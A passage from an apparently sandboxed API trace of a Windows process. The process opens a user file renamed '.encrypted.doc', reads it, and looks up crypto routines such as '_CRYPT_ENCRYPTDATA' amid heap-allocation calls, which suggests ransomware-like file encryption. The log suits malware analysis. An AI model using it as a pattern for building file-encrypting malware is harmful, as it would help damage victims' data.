HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.encrypted.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\463pkp6oz8wle1r.encrypted.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0034.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.234] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0034.234] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0034.234] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0034.234] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0034.235] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0034.235] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x3c34, lpOverlapped=0x0) returned 1 [0034.236] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0034.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c34) returned 0x955018 [0034.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0034.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0034.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0034.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c34) returned 0x958c58 [0034.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.237] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0034.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c34) returned 0x955018 [0034.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.238] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0034.238] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.238] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c34) returned 0x955018 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0034.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899a0 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c34) returned 0x95c898 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0034.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0034.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0034.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0034.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0034.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0034.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.240] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0034.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2c8 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0034.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0034.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0034.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.241] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0034.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.241] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0034.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0034.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0034.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.242] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0034.243] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0034.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0034.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 